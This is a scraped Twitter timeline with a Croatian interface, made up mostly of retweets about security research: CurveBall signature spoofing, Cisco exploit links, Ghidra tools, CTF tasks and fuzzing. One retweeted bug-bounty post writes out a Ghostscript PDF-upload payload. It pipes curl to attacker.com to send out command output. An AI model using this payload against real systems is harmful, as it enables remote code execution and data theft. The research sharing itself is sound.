Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @enio_4491
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @enio_4491
-
Enio proslijedio/la je Tweet
So
@gynvael has just finished streaming 7th installment of solving PicoCTF challenges and I've finished editing part 2 of solving Hitcon's CoreDumb with Ghidra so if you don't have yet enough
https://youtu.be/fPGcoo9d4kA #ghidra#reversing#hitcon#reversengineeringHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
#cve20200601#curveball last use case for today Yes, it's also dangerous for Microsoft VBA macro (especially when you think "Disable all Macros except digitally signed" will protect you)pic.twitter.com/bHGQ8ZEMs7Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Another use case for
#cve20200601#curveball
After my:
- Authenticode: https://twitter.com/gentilkiwi/status/1217731204373499904 … & https://twitter.com/gentilkiwi/status/1217856535918936072 …
- Outlook S/MIME: https://twitter.com/gentilkiwi/status/1218204246346293249 …
now... Microsoft Word, Excel & PowerPoint
(already existing many TLS browser POC, I will not make another one)pic.twitter.com/SFPKe2NzdwPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Ho, by the way,
#curveball#cve20200601 is not only about TLS & Authenticode... it's also for S/MIME and other signatures. Yes, it's also valid against#Outlook mail signature verification
I hope nobody rely on it for legal / workflow validationpic.twitter.com/xds8l2gSILPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
I'm excited to share my post about discovering & exploiting multiple critical vulnerabilities in Cisco's DCNM. Busting Cisco's Beans :: Hardcoding Your Way to Hell https://srcincite.io/blog/2020/01/14/busting-ciscos-beans-hardcoding-your-way-to-hell.html … PoC exploit code: https://srcincite.io/pocs/cve-2019-15975.py.txt … https://srcincite.io/pocs/cve-2019-15976.py.txt … https://srcincite.io/pocs/cve-2019-15977.py.txt …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
I'm releasing ghidra scripts that I made for pwn and reversing tasks, starting with this set of scripts to replace linux/libc magic numbers with readable names for aarch64, amd64/i386, arm/thumb, hppa, m68k, mips, ppc, ppc64, sh, sh4, sparc and sparc64. https://github.com/0xb0bb/pwndra pic.twitter.com/o1JPjyjgga
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Do you struggle to understand
#Kerberos in#ActiveDirectory environment ? This new article may help clarify things by simply explaining how Kerberos works. It is the first of a serie of posts about attacking Active Directory. Stay tuned
https://en.hackndo.com/kerberos/ Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Quick reminder that we're still updating the "0day detected in-the-wild" spreadsheet here: https://googleprojectzero.blogspot.com/p/0day.html . The first entry for 2020 is now in the books -- CVE-2019-17026 is a type confusion issue in the JIT engine for Firefox, detected in active attacks by Qihoo 360 ATA.
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
The interesting part is how to convert a limited file writing into RCE :Phttps://twitter.com/orange_8361/status/1215207230514970624 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Day 2 of our Top 5 bugs for 2019 is an LPE in win32k.sys through indexed color palettes. The deep and thorough analysis is provided by Marcin Wiązowski, who reported the bug. http://bit.ly/38O65s0
#ZDITop5Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Enio proslijedio/la je Tweet
For a very particular reason, I needed to compile the WinAFL fuzzer, though the project offers binary versions for x86 and x64, and I've noticed why many people have problems to do it on their own. Thus, I've made a short procedure to do it: https://github.com/alexandreborges/winafl …
#fuzzingpic.twitter.com/iOSQOEbWzU
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
This made it all worth it! Thank you
@nickharbour, and everyone that made#flareon6 possible.pic.twitter.com/N5Q2y3Qr7E
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Well, this might be useless, but i wrote a tool to decompile VBA pcode based on
@VessOnSecurity 's pcodedmp. Might check if it should be included in#olevba. ->https://github.com/Big5-sec/pcode2code …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
The BabyKernel Windows exploitation challenge from last week's
@DragonSectorCTF is up on GitHub:https://github.com/j00ru/ctf-tasks/tree/master/Dragon%20CTF%202019/Main%20event/BabyKernel …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
CVE-2019-1347: When a mouse over a file is enough to crash your system https://blog.tetrane.com/2019/11/12/pe-parser-crash.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
#flareon6 Shipping soon. We have a lot to ship this year so please be patient.pic.twitter.com/sP0ilyuJVY
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64 …) ) .putdeviceparams quit
#BugBountyPrikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
Reversing GO binaries like a pro : https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/ … Reversing Golang : https://2016.zeronights.ru/wp-content/uploads/2016/12/GO_Zaytsev.pdf … (Slides) The Go low-level calling convention on x86-64 : https://science.raphael.poss.name/go-calling-convention-x86-64.html … Analyzing Golang Executables : https://www.pnfsoftware.com/blog/analyzing-golang-executables/ … cc
@jebdecHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Enio proslijedio/la je Tweet
That brings
#Pwn2Own Tokyo 2019 to a close. Congrats to@fluoroacetate on successfully defending their Master of Pwn title. In two days, they racked up $195,000 for their research. Congrats!pic.twitter.com/q5OezDzqzY
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.